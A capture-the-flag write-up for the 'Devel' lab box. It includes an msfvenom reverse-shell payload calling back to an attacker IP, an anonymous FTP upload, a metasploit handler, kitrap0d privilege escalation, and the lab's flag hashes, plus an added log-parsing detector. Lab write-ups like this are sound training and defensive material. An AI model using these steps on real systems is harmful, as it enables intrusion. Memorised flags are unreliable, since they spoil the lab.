DEVEL 10.10.10.5 Write Up
Machine Created by ch4p
Tools Used for Enumeration:
1. nmap
Tools Used for Exploitation:
1. ftp
2. metasploit
Steps for primary enumeration:
1. First we use nmap (a network mapping tool) to scan the box's IP. The scan returns a list of open ports and the services running on them. On the Devel box the open ports are port 21 for FTP and port 80 for the HTTP server. The scan shows the FTP server is vulnerable to anonymous FTP login.
   Command used: nmap -A 10.10.10.5
Steps to get user.txt:
1. The scan shows the FTP server is vulnerable to anonymous FTP login. The FTP login shows the HTTP server's files, which means we can upload a shell and execute it. As the server is IIS (Microsoft ASP.NET), we are going to upload an aspx shell.
   Command to create the metasploit shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > zishan.aspx
2. Log in to the FTP server as the anonymous user with the command: ftp 10.10.10.5. Enter anonymous as the username and leave the password blank. Now upload the shell with the command: put zishan.aspx
3. Now open a reverse TCP listener in metasploit with the "use exploit/multi/handler" command. Set LHOST to your tun0 IP and LPORT to the port given in the shell. After starting the meterpreter listener, open the uploaded shell in a browser to get a meterpreter session.
4. Background the meterpreter shell with the background command. Now use post/multi/recon/local_exploit_suggester and select the session with the set SESSION 1 command to list local exploits for privilege escalation.
5. Now use the exploit/windows/local/ms10_015_kitrap0d module. Set the session and run exploit to get a meterpreter shell as administrator.
6. Run the command cat c:/Users/babis/Desktop/user.txt.txt to get the user flag.
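Seen from the server side, the upload-then-browse sequence in steps 1 to 3 leaves a recognizable trace. The following is an added example, not part of the original write-up: it parses constructed W3C-style FTP and HTTP log lines and flags anonymous uploads of server-executed file types that are later requested over HTTP. The log field layout, the anonymous account names, and the FTP root being the web root are assumptions.

```python
# Constructed sample logs in W3C extended format (field layout is an assumption).
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 10.10.14.5 - USER anonymous 331
2024-01-01 10:00:02 10.10.14.5 anonymous PASS - 230
2024-01-01 10:00:09 10.10.14.5 anonymous STOR /zishan.aspx 226
2024-01-01 10:05:00 192.168.1.20 webadmin STOR /css/site.css 226
2024-01-01 10:06:00 10.10.14.9 anonymous STOR /notes.aspx 550
"""
HTTP_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:30 10.10.14.5 GET /zishan.aspx 200
2024-01-01 10:01:00 192.168.1.30 GET /iisstart.htm 200
"""
ANON_USERS = {"anonymous", "ftp"}                  # assumed anonymous account names
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")   # file types IIS runs server-side

def parse_w3c(text):
    """Yield one dict per record, taking column names from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def anonymous_script_uploads(ftp_text):
    """Successful (2xx) STOR of a server-executed file type by an anonymous user."""
    return [r for r in parse_w3c(ftp_text)
            if r.get("cs-method", "").upper() == "STOR"
            and r.get("cs-username", "").lower() in ANON_USERS
            and r.get("sc-status", "").startswith("2")
            and r.get("cs-uri-stem", "").lower().endswith(SCRIPT_EXT)]

def executed_uploads(ftp_text, http_text):
    """Uploads that were later served over HTTP: (path, uploader IP, requester IP)."""
    http = list(parse_w3c(http_text))
    hits = []
    for up in anonymous_script_uploads(ftp_text):
        uploaded_at = up["date"] + " " + up["time"]   # ISO order sorts as text
        for req in http:
            if (req.get("cs-uri-stem", "").lower() == up["cs-uri-stem"].lower()
                    and req.get("sc-status") == "200"
                    and req["date"] + " " + req["time"] >= uploaded_at):
                hits.append((up["cs-uri-stem"], up["c-ip"], req["c-ip"]))
    return hits

print(executed_uploads(FTP_LOG, HTTP_LOG))
```

Any hit means the FTP site grants anonymous write access to a directory the web server executes from; removing either the anonymous write permission or the shared root closes the path.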
Steps to get root.txt:
1. Run the command cat c:/Users/Administrator/Desktop/root.txt.txt to get the root flag.
Flags:
1. user.txt flag: 9ecdd6a3aedf24b41562fea70f4cb3e8
2. root.txt flag: e621a0b5041708797c4fc4728bc72b4b